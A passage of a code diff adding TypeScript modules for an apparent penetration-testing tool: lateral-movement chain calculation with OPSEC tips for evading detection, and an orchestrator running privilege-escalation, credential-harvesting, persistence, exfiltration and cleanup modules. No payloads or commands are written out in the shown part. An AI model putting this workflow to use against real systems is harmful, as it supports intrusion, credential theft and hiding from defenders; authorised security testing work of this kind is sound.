+        p.destination.toLowerCase().includes(hvt.toLowerCase())
+      )
+    )
+  }
+
+  /**
+   * Calculate attack chain from source to final target through intermediaries.
+   */
+  export function calculateAttackChain(
+    paths: PostExploitTypes.LateralPath[],
+    source: string,
+    finalTarget: string,
+    maxHops: number = 3
+  ): PostExploitTypes.LateralPath[][] {
+    const chains: PostExploitTypes.LateralPath[][] = []
+
+    function findChains(
+      currentSource: string,
+      currentChain: PostExploitTypes.LateralPath[],
+      visited: Set<string>
+    ) {
+      if (currentChain.length > maxHops) return
+      if (visited.has(currentSource)) return
+
+      visited.add(currentSource)
+
+      const outgoingPaths = paths.filter(p => p.source === currentSource)
+
+      for (const path of outgoingPaths) {
+        const newChain = [...currentChain, path]
+
+        if (path.destination === finalTarget) {
+          chains.push(newChain)
+        } else {
+          findChains(path.destination, newChain, new Set(visited))
+        }
+      }
+    }
+
+    findChains(source, [], new Set())
+
+    // Sort chains by length (shorter is better)
+    return chains.sort((a, b) => a.length - b.length)
+  }
+
+  /**
+   * Format a lateral movement path for display.
+   */
+  export function formatPath(path: PostExploitTypes.LateralPath): string {
+    const lines: string[] = []
+    lines.push(`[PATH] ${path.source} -> ${path.destination}`)
+    lines.push(`  Method: ${path.method}`)
+    if (path.credentials) {
+      lines.push(`  Credentials: ${path.credentials} (${path.credentialType || "unknown"})`)
+    }
+    lines.push(`  Risk: ${path.risk}`)
+    lines.push(`  Detection Risk: ${path.detectionRisk}`)
+    if (path.tested) {
+      lines.push(`  Status: ${path.successful ? "SUCCESSFUL" : "FAILED"}`)
+    } else {
+      lines.push(`  Status: Not tested`)
+    }
+    if (path.notes) {
+      lines.push(`  Notes: ${path.notes}`)
+    }
+    lines.push(`  MITRE: ${path.mitre.join(", ")}`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format multiple paths as a summary.
+   */
+  export function formatPathSummary(paths: PostExploitTypes.LateralPath[]): string {
+    if (paths.length === 0) {
+      return "No lateral movement paths identified."
+    }
+
+    const lines: string[] = []
+    lines.push(`Found ${paths.length} lateral movement path(s):`)
+    lines.push("")
+
+    // Group by destination
+    const byDest = new Map<string, PostExploitTypes.LateralPath[]>()
+    for (const path of paths) {
+      const existing = byDest.get(path.destination) || []
+      existing.push(path)
+      byDest.set(path.destination, existing)
+    }
+
+    for (const [dest, destPaths] of byDest) {
+      lines.push(`To: ${dest}`)
+      for (const path of destPaths) {
+        const status = path.tested ? (path.successful ? "[OK]" : "[FAIL]") : "[?]"
+        lines.push(`  ${status} via ${path.method} from ${path.source} (${path.detectionRisk} detection)`)
+      }
+      lines.push("")
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format an attack chain for display.
+   */
+  export function formatAttackChain(chain: PostExploitTypes.LateralPath[]): string {
+    if (chain.length === 0) {
+      return "Empty chain"
+    }
+
+    const lines: string[] = []
+    lines.push(`Attack Chain (${chain.length} hop${chain.length > 1 ? "s" : ""})`)
+    lines.push("")
+
+    let step = 1
+    for (const path of chain) {
+      lines.push(`Step ${step}: ${path.source} -> ${path.destination}`)
+      lines.push(`  Method: ${path.method}`)
+      lines.push(`  Detection: ${path.detectionRisk}`)
+      step++
+    }
+
+    // Calculate overall risk
+    const hasHighDetection = chain.some(p => p.detectionRisk === "high")
+    const overallRisk = hasHighDetection ? "HIGH" : chain.length > 2 ? "MEDIUM" : "LOW"
+    lines.push("")
+    lines.push(`Overall Detection Risk: ${overallRisk}`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Generate recommendations for a path.
+   */
+  export function getPathRecommendations(path: PostExploitTypes.LateralPath): string[] {
+    const recommendations: string[] = []
+
+    // Detection risk recommendations
+    if (path.detectionRisk === "high") {
+      recommendations.push("Consider using a lower-detection method if available")
+      recommendations.push("Ensure proper OPSEC measures are in place")
+    }
+
+    // Method-specific recommendations
+    switch (path.method) {
+      case "psexec":
+        recommendations.push("PSExec creates a service - will leave artifacts")
+        recommendations.push("Consider wmiexec or smbexec for less noise")
+        break
+      case "pass_the_hash":
+        recommendations.push("Use Kerberos (overpass-the-hash) when possible for better OPSEC")
+        break
+      case "rdp":
+        recommendations.push("RDP leaves extensive logs - use for interactive tasks only")
+        recommendations.push("Consider SharpRDP for command execution instead")
+        break
+      case "winrm":
+        recommendations.push("Ensure WinRM logging is accounted for in cleanup")
+        break
+    }
+
+    // Credential recommendations
+    if (path.credentialType === "password") {
+      recommendations.push("Consider converting to hash to avoid cleartext transmission")
+    }
+
+    return recommendations
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/orchestrator.ts b/packages/opencode/src/pentest/postexploit/orchestrator.ts
new file mode 100644
index 00000000000..81966a39d01
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/orchestrator.ts
@@ -0,0 +1,1003 @@
+/**
+ * @fileoverview Post-Exploitation Orchestrator
+ *
+ * Coordinates post-exploitation workflow including privilege escalation,
+ * lateral movement, credential harvesting, persistence, exfiltration,
+ * and cleanup based on assessment profiles.
+ *
+ * @module pentest/postexploit/orchestrator
+ */
+
+import { Bus } from "../../bus"
+import { PostExploitTypes } from "./types"
+import { PostExploitEvents } from "./events"
+import { PostExploitStorage, type StorageConfig } from "./storage"
+import { PostExploitProfiles } from "./profiles"
+import { Privesc } from "./privesc"
+import { Lateral } from "./lateral"
+import { Creds } from "./creds"
+import { Persistence } from "./persistence"
+import { Exfil } from "./exfil"
+import { Cleanup } from "./cleanup"
+import { Parsers } from "./parsers"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "postexploit.orchestrator" })
+
+/**
+ * Post-exploitation orchestrator namespace.
+ */
+export namespace PostExploitOrchestrator {
+  /**
+   * Session creation options.
+   */
+  export interface CreateSessionOptions {
+    target: string
+    platform: PostExploitTypes.Platform
+    currentUser: string
+    currentPrivilege: "user" | "admin" | "root" | "system"
+    hostname?: string
+    domain?: string
+    profile?: PostExploitTypes.ProfileId
+    storage?: StorageConfig
+  }
+
+  /**
+   * Scan options for individual modules.
+   */
+  export interface ScanOptions {
+    sessionId: string
+    storage?: StorageConfig
+    dryRun?: boolean
+    verbose?: boolean
+  }
+
+  /**
+   * Parse options for LinPEAS/WinPEAS output.
+   */
+  export interface ParseOptions {
+    sessionId?: string
+    tool: Parsers.ParserType
+    content: string
+    storage?: StorageConfig
+  }
+
+  /**
+   * Create a new post-exploitation session.
+   */
+  export async function createSession(
+    options: CreateSessionOptions
+  ): Promise<PostExploitTypes.PostExploitSession> {
+    const profile = PostExploitProfiles.get(options.profile || "standard") || PostExploitProfiles.Standard
+
+    const session: Omit<PostExploitTypes.PostExploitSession, "id"> = {
+      target: options.target,
+      platform: options.platform,
+      currentUser: options.currentUser,
+      currentPrivilege: options.currentPrivilege,
+      hostname: options.hostname,
+      domain: options.domain,
+      profile: profile.id,
+      status: "running",
+      privescVectors: [],
+      lateralTargets: [],
+      lateralPaths: [],
+      credentialLocations: [],
+      credentials: [],
+      persistenceOptions: [],
+      dataTargets: [],
+      exfilChannels: [],
+      artifacts: [],
+      cleanupChecklist: [],
+      stats: {
+        privescVectors: 0,
+        lateralTargets: 0,
+        lateralPaths: 0,
+        credentialLocations: 0,
+        harvestedCredentials: 0,
+        persistenceOptions: 0,
+        dataTargets: 0,
+        exfilChannels: 0,
+        artifacts: 0,
+        cleanupItems: 0,
+        duration: 0,
+      },
+      startedAt: Date.now(),
+    }
+
+    const saved = await PostExploitStorage.saveSession(session, options.storage)
+
+    // Emit session started event
+    Bus.publish(PostExploitEvents.SessionStarted, {
+      sessionID: saved.id,
+      target: saved.target,
+      platform: saved.platform,
+      profile: saved.profile,
+      currentUser: saved.currentUser,
+      currentPrivilege: saved.currentPrivilege,
+    })
+
+    log.info("Post-exploitation session created", {
+      sessionId: saved.id,
+      target: saved.target,
+      platform: saved.platform,
+      profile: saved.profile,
+    })
+
+    return saved
+  }
+
+  /**
+   * Get session status and summary.
+   */
+  export async function getSessionStatus(
+    sessionId: string,
+    storage?: StorageConfig
+  ): Promise<{
+    session: PostExploitTypes.PostExploitSession | null
+    summary: string
+  }> {
+    const session = await PostExploitStorage.getSession(sessionId, storage)
+    if (!session) {
+      return { session: null, summary: "Session not found" }
+    }
+
+    const lines: string[] = []
+    lines.push(`Session: ${session.id}`)
+    lines.push(`Target: ${session.target}`)
+    lines.push(`Platform: ${session.platform}`)
+    lines.push(`User: ${session.currentUser} (${session.currentPrivilege})`)
+    lines.push(`Profile: ${session.profile}`)
+    lines.push(`Status: ${session.status}`)
+    lines.push("")
+    lines.push("Statistics:")
+    lines.push(`  Privesc Vectors: ${session.stats.privescVectors}`)
+    lines.push(`  Lateral Targets: ${session.stats.lateralTargets}`)
+    lines.push(`  Lateral Paths: ${session.stats.lateralPaths}`)
+    lines.push(`  Credential Locations: ${session.stats.credentialLocations}`)
+    lines.push(`  Harvested Credentials: ${session.stats.harvestedCredentials}`)
+    lines.push(`  Persistence Options: ${session.stats.persistenceOptions}`)
+    lines.push(`  Data Targets: ${session.stats.dataTargets}`)
+    lines.push(`  Exfil Channels: ${session.stats.exfilChannels}`)
+    lines.push(`  Artifacts: ${session.stats.artifacts}`)
+
+    if (session.endedAt) {
+      lines.push("")
+      lines.push(`Duration: ${Math.round((session.endedAt - session.startedAt) / 1000)}s`)
+    }
+
+    return { session, summary: lines.join("\n") }
+  }
+
+  /**
+   * Run privilege escalation scan.
+   */
+  export async function scanPrivesc(options: ScanOptions): Promise<{
+    vectors: PostExploitTypes.PrivescVector[]
+    commands: string[]
+    summary: string
+  }> {
+    const session = await PostExploitStorage.getSession(options.sessionId, options.storage)
+    if (!session) {
+      throw new Error(`Session not found: ${options.sessionId}`)
+    }
+
+    const profile = PostExploitProfiles.get(session.profile) || PostExploitProfiles.Standard
+    if (!profile.modules.privesc.enabled) {
+      return { vectors: [], commands: [], summary: "Privesc module disabled for this profile" }
+    }
+
+    Bus.publish(PostExploitEvents.ModuleProgress, {
+      sessionID: session.id,
+      module: "privesc",
+      action: "scanning",
+      progress: 0,
+      message: "Starting privilege escalation scan",
+    })
+
+    // Get discovery commands for the platform (flatten Record to array)
+    const commandsRecord = Privesc.getDiscoveryCommands(session.platform)
+    const commands = Object.values(commandsRecord).flat()
+
+    // Get all vectors for the platform (guidance mode - not running actual exploits)
+    const vectors: Omit<PostExploitTypes.PrivescVector, "id" | "discoveredAt">[] = []
+
+    if (session.platform === "linux") {
+      // Add SUID guidance
+      const suidVectors = Privesc.getSUIDBinaryInfo().map(binary => ({
+        category: "suid" as const,
+        platform: "linux" as const,
+        name: `SUID: ${binary.name}`,
+        description: binary.description,
+        risk: binary.risk,
+        exploitability: binary.exploitability,
+        target: binary.name,
+        technique: binary.technique,
+        commands: binary.commands,
+        prerequisites: [],
+        detectionRisk: binary.detectionRisk,
+        gtfobins: binary.gtfobins,
+        mitre: binary.mitre,
+      }))
+      vectors.push(...suidVectors)
+
+      // Add sudo guidance
+      const sudoVectors = Privesc.getSudoInfo().map(info => ({
+        category: "sudo" as const,
+        platform: "linux" as const,
+        name: `Sudo: ${info.name}`,
+        description: info.description,
+        risk: info.risk,
+        exploitability: info.exploitability,
+        target: info.name,
+        technique: info.technique,
+        commands: info.commands,
+        prerequisites: [],
+        detectionRisk: info.detectionRisk,
+        gtfobins: info.gtfobins,
+        mitre: info.mitre,
+      }))
+      vectors.push(...sudoVectors)
+
+      // Add kernel exploits guidance
+      const kernelVectors = Privesc.getKernelExploits("linux").map(exploit => ({
+        category: "kernel" as const,
+        platform: "linux" as const,
+        name: exploit.name,
+        description: exploit.description,
+        risk: exploit.risk,
+        exploitability: exploit.exploitability,
+        target: exploit.targetKernels.join(", "),
+        technique: exploit.technique,
+        commands: exploit.commands,
+        prerequisites: exploit.prerequisites,
+        detectionRisk: exploit.detectionRisk,
+        mitre: exploit.mitre,
+      }))
+      vectors.push(...kernelVectors)
+    } else {
+      // Windows privesc vectors
+      const serviceVectors = Privesc.getServiceInfo().map(svc => ({
+        category: "service" as const,
+        platform: "windows" as const,
+        name: `Service: ${svc.name}`,
+        description: svc.description,
+        risk: svc.risk,
+        exploitability: svc.exploitability,
+        target: svc.name,
+        technique: svc.technique,
+        commands: svc.commands,
+        prerequisites: [],
+        detectionRisk: svc.detectionRisk,
+        lolbas: svc.lolbas,
+        mitre: svc.mitre,
+      }))
+      vectors.push(...serviceVectors)
+
+      // Add token privilege guidance
+      const tokenVectors = Privesc.getTokenInfo().map(token => ({
+        category: "token" as const,
+        platform: "windows" as const,
+        name: `Token: ${token.name}`,
+        description: token.description,
+        risk: token.risk,
+        exploitability: token.exploitability,
+        target: token.name,
+        technique: token.technique,
+        commands: token.commands,
+        prerequisites: [],
+        detectionRisk: token.detectionRisk,
+        mitre: token.mitre,
+      }))
+      vectors.push(...tokenVectors)
+
+      // Add UAC bypass guidance
+      const uacVectors = Privesc.getUACBypassInfo().map(uac => ({
+        category: "uac_bypass" as const,
+        platform: "windows" as const,
+        name: uac.name,
+        description: uac.description,
+        risk: uac.risk,
+        exploitability: uac.exploitability,
+        target: uac.binary,
+        technique: uac.technique,
+        commands: uac.commands,
+        prerequisites: uac.prerequisites,
+        detectionRisk: uac.detectionRisk,
+        mitre: uac.mitre,
+      }))
+      vectors.push(...uacVectors)
+    }
+
+    // Save vectors to session
+    const savedVectors: PostExploitTypes.PrivescVector[] = []
+    for (const vector of vectors) {
+      const saved = await PostExploitStorage.addPrivescVector(session.id, vector, options.storage)
+      if (saved) {
+        savedVectors.push(saved)
+
+        // Emit event for each vector
+        Bus.publish(PostExploitEvents.PrivescVectorFound, {
+          sessionID: session.id,
+          host: session.target,
+          category: vector.category,
+          name: vector.name,
+          risk: vector.risk,
+          exploitability: vector.exploitability,
+          target: vector.target,
+          detectionRisk: vector.detectionRisk,
+          mitre: vector.mitre,
+        })
+      }
+    }
+
+    Bus.publish(PostExploitEvents.ModuleProgress, {
+      sessionID: session.id,
+      module: "privesc",
+      action: "completed",
+      progress: 100,
+      message: `Found ${savedVectors.length} privilege escalation vectors`,
+    })
+
+    // Generate summary
+    const summary = Privesc.formatVectors(savedVectors)
+
+    return { vectors: savedVectors, commands, summary }
+  }
+
+  /**
+   * Run lateral movement discovery.
+   */
+  export async function scanLateral(options: ScanOptions): Promise<{
+    targets: PostExploitTypes.LateralTarget[]
+    paths: PostExploitTypes.LateralPath[]
+    commands: string[]
+    summary: string
+  }> {
+    const session = await PostExploitStorage.getSession(options.sessionId, options.storage)
+    if (!session) {
+      throw new Error(`Session not found: ${options.sessionId}`)
+    }
+
+    const profile = PostExploitProfiles.get(session.profile) || PostExploitProfiles.Standard
+    if (!profile.modules.lateral.enabled) {
+      return { targets: [], paths: [], commands: [], summary: "Lateral module disabled for this profile" }
+    }
+
+    Bus.publish(PostExploitEvents.ModuleProgress, {
+      sessionID: session.id,
+      module: "lateral",
+      action: "scanning",
+      progress: 0,
+      message: "Starting lateral movement discovery",
+    })
+
+    // Get discovery commands
+    const commands = Lateral.getDiscoveryCommands(session.platform)
+
+    // Get method information
+    const methods = Lateral.getMethods(session.platform)
+
+    // Generate summary
+    const lines: string[] = []
+    lines.push("LATERAL MOVEMENT GUIDANCE")
+    lines.push("=".repeat(40))
+    lines.push("")
+    lines.push("Discovery Commands:")
+    for (const cmd of commands.slice(0, 5)) {
+      lines.push(`  ${cmd}`)
+    }
+    lines.push("")
+    lines.push("Available Methods:")
+    for (const method of methods) {
+      lines.push(`  [${method.detectionRisk}] ${method.name}`)
+      lines.push(`      ${method.description}`)
+    }
+    lines.push("")
+    lines.push("Quick Reference:")
+    lines.push(Lateral.getQuickReference())
+
+    Bus.publish(PostExploitEvents.ModuleProgress, {
+      sessionID: session.id,
+      module: "lateral",
+      action: "completed",
+      progress: 100,
+      message: "Lateral movement guidance generated",
+    })
+
+    return {
+      targets: session.lateralTargets,
+      paths: session.lateralPaths,
+      commands,
+      summary: lines.join("\n"),
+    }
+  }
+
+  /**
+   * Run credential discovery.
+   */
+  export async function scanCreds(options: ScanOptions): Promise<{
+    locations: PostExploitTypes.CredentialLocation[]
+    commands: string[]
+    summary: string
+  }> {
+    const session = await PostExploitStorage.getSession(options.sessionId, options.storage)
+    if (!session) {
+      throw new Error(`Session not found: ${options.sessionId}`)
+    }
+
+    const profile = PostExploitProfiles.get(session.profile) || PostExploitProfiles.Standard
+    if (!profile.modules.creds.enabled) {
+      return { locations: [], commands: [], summary: "Creds module disabled for this profile" }
+    }
+
+    Bus.publish(PostExploitEvents.ModuleProgress, {
+      sessionID: session.id,
+      module: "creds",
+      action: "scanning",
+      progress: 0,
+      message: "Starting credential discovery",
+    })
+
+    // Get credential locations for the platform
+    const credLocations = Creds.getLocations(session.platform)
+
+    // Save locations to session
+    for (const loc of credLocations) {
+      const savedLoc = await PostExploitStorage.addCredentialLocation(
+        session.id,
+        {
+          source: loc.source,
+          platform: session.platform,
+          path: loc.path,
+          description: loc.description,
+          expectedTypes: loc.expectedTypes,
+          accessLevel: loc.accessLevel,
+          extractionCommands: loc.extractionCommands,
+          tools: loc.tools,
+          risk: loc.risk,
+          detectionRisk: loc.detectionRisk,
+          mitre: loc.mitre,
+          discovered: false,
+        },
+        options.storage
+      )
+
+      if (savedLoc) {
+        Bus.publish(PostExploitEvents.CredentialLocationDiscovered, {
+          sessionID: session.id,
+          host: session.target,
+          source: loc.source,
+          path: loc.path,
+          expectedTypes: loc.expectedTypes,
+          accessLevel: loc.accessLevel,
+          detectionRisk: loc.detectionRisk,
+        })
+      }
+    }
+
+    // Get discovery commands
+    const commands = Creds.getDiscoveryCommands(session.platform)
+
+    // Generate summary
+    const summary = Creds.formatLocations(session.platform, credLocations)
+
+    Bus.publish(PostExploitEvents.ModuleProgress, {
+      sessionID: session.id,
+      module: "creds",
+      action: "completed",
+      progress: 100,
+      message: `Found ${credLocations.length} credential locations`,
+    })
+
+    // Get updated session
+    const updatedSession = await PostExploitStorage.getSession(options.sessionId, options.storage)
+
+    return {
+      locations: updatedSession?.credentialLocations || [],
+      commands,
+      summary,
+    }
+  }
+
+  /**
+   * Catalog persistence mechanisms.
+   */
+  export async function scanPersist(options: ScanOptions): Promise<{
+    mechanisms: PostExploitTypes.PersistenceMechanism[]
+    summary: string
+  }> {
+    const session = await PostExploitStorage.getSession(options.sessionId, options.storage)
+    if (!session) {
+      throw new Error(`Session not found: ${options.sessionId}`)
+    }
+
+    const profile = PostExploitProfiles.get(session.profile) || PostExploitProfiles.Standard
+    if (!profile.modules.persist.enabled) {
+      return { mechanisms: [], summary: "Persist module disabled for this profile" }
+    }
+
+    Bus.publish(PostExploitEvents.ModuleProgress, {
+      sessionID: session.id,
+      module: "persist",
+      action: "cataloging",
+      progress: 0,
+      message: "Cataloging persistence mechanisms",
+    })
+
+    // Get persistence mechanisms for the platform
+    const mechanisms = Persistence.getMechanisms(session.platform)
+
+    // Save mechanisms to session
+    for (const mech of mechanisms) {
+      const savedMech = await PostExploitStorage.addPersistenceMechanism(
+        session.id,
+        {
+          category: mech.category,
+          platform: session.platform,
+          name: mech.name,
+          description: mech.description,
+          location: mech.location,
+          privilege: mech.privilege,
+          survival: mech.survival,
+          detectionRisk: mech.detectionRisk,
+          commands: mech.commands,
+          cleanup: mech.cleanup,
+          indicators: mech.indicators,
+          mitre: mech.mitre,
+        },
+        options.storage
+      )
+
+      if (savedMech) {
+        Bus.publish(PostExploitEvents.PersistenceOpportunity, {
+          sessionID: session.id,
+          host: session.target,
+          category: mech.category,
+          name: mech.name,
+          location: mech.location,
+          privilege: mech.privilege,
+          survival: mech.survival,
+          detectionRisk: mech.detectionRisk,
+        })
+      }
+    }
+
+    // Emit cataloged event
+    Bus.publish(PostExploitEvents.PersistenceCataloged, {
+      sessionID: session.id,
+      host: session.target,
+      platform: session.platform,
+      mechanismCount: mechanisms.length,
+      categories: [...new Set(mechanisms.map(m => m.category))],
+    })
+
+    // Generate summary
+    const summary = Persistence.formatMechanisms(session.platform, mechanisms)
+
+    Bus.publish(PostExploitEvents.ModuleProgress, {
+      sessionID: session.id,
+      module: "persist",
+      action: "completed",
+      progress: 100,
+      message: `Cataloged ${mechanisms.length} persistence mechanisms`,
+    })
+
+    // Get updated session
+    const updatedSession = await PostExploitStorage.getSession(options.sessionId, options.storage)
+
+    return {
+      mechanisms: updatedSession?.persistenceOptions || [],
+      summary,
+    }
+  }
+
+  /**
+   * Run data exfiltration discovery.
+   */
+  export async function scanExfil(options: ScanOptions): Promise<{
+    targets: PostExploitTypes.DataTarget[]
+    channels: PostExploitTypes.ExfilChannel[]
+    commands: string[]
+    summary: string
+  }> {
+    const session = await PostExploitStorage.getSession(options.sessionId, options.storage)
+    if (!session) {
+      throw new Error(`Session not found: ${options.sessionId}`)
+    }
+
+    const profile = PostExploitProfiles.get(session.profile) || PostExploitProfiles.Standard
+    if (!profile.modules.exfil.enabled) {
+      return { targets: [], channels: [], commands: [], summary: "Exfil module disabled for this profile" }
+    }
+
+    Bus.publish(PostExploitEvents.ModuleProgress, {
+      sessionID: session.id,
+      module: "exfil",
+      action: "discovering",
+      progress: 0,
+      message: "Starting data exfiltration discovery",
+    })
+
+    // Get discovery commands
+    const commands = Exfil.getDiscoveryCommands(session.platform)
+
+    // Get channel information
+    const stealthyChannels = Exfil.getStealthyChannels()
+    const highBandwidthChannels = Exfil.getHighBandwidthChannels()
+
+    // Save channel information to session
+    const allChannelTypes = [...new Set([...stealthyChannels, ...highBandwidthChannels])]
+    for (const channelType of allChannelTypes) {
+      const channelInfo = Exfil.getChannelDetails(channelType)
+
+      await PostExploitStorage.addExfilChannel(
+        session.id,
+        {
+          type: channelType,
+          name: channelInfo.name,
+          description: channelInfo.description,
+          available: true,
+          bandwidth: channelInfo.bandwidth,
+          detectionRisk: channelInfo.detectionRisk,
+          commands: channelInfo.commands,
+          tools: channelInfo.tools,
+          prerequisites: channelInfo.prerequisites,
+          mitre: channelInfo.mitre,
+        },
+        options.storage
+      )
+
+      Bus.publish(PostExploitEvents.ExfilChannelAnalyzed, {
+        sessionID: session.id,
+        host: session.target,
+        channelType,
+        available: true,
+        bandwidth: channelInfo.bandwidth,
+        detectionRisk: channelInfo.detectionRisk,
+      })
+    }
+
+    // Generate summary
+    const summary = Exfil.getQuickReference()
+
+    Bus.publish(PostExploitEvents.ModuleProgress, {
+      sessionID: session.id,
+      module: "exfil",
+      action: "completed",
+      progress: 100,
+      message: "Data exfiltration discovery completed",
+    })
+
+    // Get updated session
+    const updatedSession = await PostExploitStorage.getSession(options.sessionId, options.storage)
+
+    return {
+      targets: updatedSession?.dataTargets || [],
+      channels: updatedSession?.exfilChannels || [],
+      commands,
+      summary,
+    }
+  }
+
+  /**
+   * Generate cleanup guidance.
+   */
+  export async function generateCleanup(options: ScanOptions): Promise<{
+    checklist: PostExploitTypes.CleanupChecklistItem[]
+    logGuidance: string
+    summary: string
+  }> {
+    const session = await PostExploitStorage.getSession(options.sessionId, options.storage)
+    if (!session) {
+      throw new Error(`Session not found: ${options.sessionId}`)
+    }
+
+    const profile = PostExploitProfiles.get(session.profile) || PostExploitProfiles.Standard
+    if (!profile.modules.cleanup.enabled) {
+      return { checklist: [], logGuidance: "", summary: "Cleanup module disabled for this profile" }
+    }
+
+    Bus.publish(PostExploitEvents.ModuleProgress, {
+      sessionID: session.id,
+      module: "cleanup",
+      action: "generating",
+      progress: 0,
+      message: "Generating cleanup guidance",
+    })
+
+    // Generate cleanup checklist based on artifacts
+    const checklist = Cleanup.generateChecklist(session.platform, session.artifacts, {
+      includeLogCleanup: profile.modules.cleanup.generateChecklist,
+      includeForensicArtifacts: profile.modules.cleanup.generateChecklist,
+    })
+
+    // Update session with checklist
+    const updatedSession: PostExploitTypes.PostExploitSession = {
+      ...session,
+      cleanupChecklist: checklist,
+      stats: {
+        ...session.stats,
+        cleanupItems: checklist.length,
+      },
+    }
+    await PostExploitStorage.saveSession(updatedSession, options.storage)
+
+    // Emit event
+    Bus.publish(PostExploitEvents.CleanupChecklistGenerated, {
+      sessionID: session.id,
+      host: session.target,
+      artifactCount: session.artifacts.length,
+      checklistItems: checklist.length,
+      criticalItems: checklist.filter(i => i.priority === "critical").length,
+    })
+
+    // Get log cleanup guidance
+    const logGuidance = Cleanup.formatLogGuidance(session.platform)
+
+    // Generate summary
+    const summary = [
+      Cleanup.formatChecklist(checklist),
+      "",
+      Cleanup.getQuickReference(session.platform),
+    ].join("\n")
+
+    Bus.publish(PostExploitEvents.ModuleProgress, {
+      sessionID: session.id,
+      module: "cleanup",
+      action: "completed",
+      progress: 100,
+      message: `Generated ${checklist.length} cleanup items`,
+    })
+
+    return { checklist, logGuidance, summary }
+  }
+
+  /**
+   * Parse LinPEAS/WinPEAS output.
+   */
+  export async function parsePEAS(options: ParseOptions): Promise<{
+    result: ReturnType<typeof Parsers.parse>
+    summary: string
+    vectorsAdded: number
+  }> {
+    // Auto-detect tool type if not specified
+    const tool = options.tool || Parsers.detectType(options.content) || "linpeas"
+
+    // Parse the output
+    const result = Parsers.parse(tool, options.content)
+
+    // Format results
+    const summary = Parsers.formatResults(tool, result)
+
+    let vectorsAdded = 0
+
+    // If session ID provided, add vectors to session
+    if (options.sessionId) {
+      const session = await PostExploitStorage.getSession(options.sessionId, options.storage)
+      if (session) {
+        for (const vector of result.privescVectors) {
+          const saved = await PostExploitStorage.addPrivescVector(
+            options.sessionId,
+            vector,
+            options.storage
+          )
+          if (saved) {
+            vectorsAdded++
+
+            Bus.publish(PostExploitEvents.PrivescVectorFound, {
+              sessionID: options.sessionId,
+              host: session.target,
+              category: vector.category,
+              name: vector.name,
+              risk: vector.risk,
+              exploitability: vector.exploitability,
+              target: vector.target,
+              detectionRisk: vector.detectionRisk,
+              mitre: vector.mitre,
+            })
+          }
+        }
+
+        // Emit parse event
+        if (tool === "linpeas") {
+          Bus.publish(PostExploitEvents.LinPEASParsed, {
+            sessionID: options.sessionId,
+            host: session.target,
+            sectionsFound: 0,
+            findingsCount: result.summary.totalFindings,
+            privescVectors: result.summary.privescVectorCount,
+            criticalFindings: result.summary.criticalFindings,
+          })
+        } else {
+          Bus.publish(PostExploitEvents.WinPEASParsed, {
+            sessionID: options.sessionId,
+            host: session.target,
+            sectionsFound: 0,
+            findingsCount: result.summary.totalFindings,
+            privescVectors: result.summary.privescVectorCount,
+            criticalFindings: result.summary.criticalFindings,
+          })
+        }
+      }
+    }
+
+    return { result, summary, vectorsAdded }
+  }
+
+  /**
+   * Complete a session.
+   */
+  export async function completeSession(
+    sessionId: string,
+    storage?: StorageConfig
+  ): Promise<PostExploitTypes.PostExploitSession | null> {
+    const session = await PostExploitStorage.getSession(sessionId, storage)
+    if (!session) return null
+
+    const endedAt = Date.now()
+    const duration = endedAt - session.startedAt
+
+    const completed: PostExploitTypes.PostExploitSession = {
+      ...session,
+      status: "completed",
+      endedAt,
+      stats: {
+        ...session.stats,
+        duration,
+      },
+    }
+
+    const saved = await PostExploitStorage.saveSession(completed, storage)
+
+    // Emit completion event
+    Bus.publish(PostExploitEvents.SessionCompleted, {
+      sessionID: saved.id,
+      target: saved.target,
+      platform: saved.platform,
+      profile: saved.profile,
+      duration,
+      stats: {
+        privescVectors: saved.stats.privescVectors,
+        lateralTargets: saved.stats.lateralTargets,
+        credentials: saved.stats.harvestedCredentials,
+        persistenceOptions: saved.stats.persistenceOptions,
+        dataTargets: saved.stats.dataTargets,
+        artifacts: saved.stats.artifacts,
+      },
+      status: "completed",
+    })
+
+    log.info("Post-exploitation session completed", {
+      sessionId: saved.id,
+      duration,
+      stats: saved.stats,
+    })
+
+    return saved
+  }
+
+  /**
+   * Run a full assessment based on profile.
+   */
+  export async function runAssessment(options: ScanOptions): Promise<{
+    session: PostExploitTypes.PostExploitSession | null
+    summary: string
+  }> {
+    const session = await PostExploitStorage.getSession(options.sessionId, options.storage)
+    if (!session) {
+      return { session: null, summary: "Session not found" }
+    }
+
+    const profile = PostExploitProfiles.get(session.profile) || PostExploitProfiles.Standard
+    const results: string[] = []
+
+    results.push(`POST-EXPLOITATION ASSESSMENT: ${session.target}`)
+    results.push("=".repeat(50))
+    results.push(`Profile: ${profile.name}`)
+    results.push(`Platform: ${session.platform}`)
+    results.push(`User: ${session.currentUser} (${session.currentPrivilege})`)
+    results.push("")
+
+    // Run enabled modules
+    if (profile.modules.privesc.enabled) {
+      try {
+        const privescResult = await scanPrivesc(options)
+        results.push("[PRIVILEGE ESCALATION]")
+        results.push(privescResult.summary)
+        results.push("")
+      } catch (err) {
+        results.push("[PRIVILEGE ESCALATION] Error: " + String(err))
+        results.push("")
+      }
+    }
+
+    if (profile.modules.lateral.enabled) {
+      try {
+        const lateralResult = await scanLateral(options)
+        results.push("[LATERAL MOVEMENT]")
+        results.push(lateralResult.summary)
+        results.push("")
+      } catch (err) {
+        results.push("[LATERAL MOVEMENT] Error: " + String(err))
+        results.push("")
+      }
+    }
+
+    if (profile.modules.creds.enabled) {
+      try {
+        const credsResult = await scanCreds(options)
+        results.push("[CREDENTIALS]")
+        results.push(credsResult.summary)
+        results.push("")
+      } catch (err) {
+        results.push("[CREDENTIALS] Error: " + String(err))
+        results.push("")
+      }
+    }
+
+    if (profile.modules.persist.enabled && profile.modules.persist.catalog) {
+      try {
+        const persistResult = await scanPersist(options)
+        results.push("[PERSISTENCE]")
+        results.push(persistResult.summary)
+        results.push("")
+      } catch (err) {
+        results.push("[PERSISTENCE] Error: " + String(err))
+        results.push("")
+      }
+    }
+
+    if (profile.modules.exfil.enabled) {
+      try {
+        const exfilResult = await scanExfil(options)
+        results.push("[EXFILTRATION]")
+        results.push(exfilResult.summary)
+        results.push("")
+      } catch (err) {
+        results.push("[EXFILTRATION] Error: " + String(err))
+        results.push("")
+      }
+    }
+
+    if (profile.modules.cleanup.enabled && profile.modules.cleanup.generateChecklist) {
+      try {
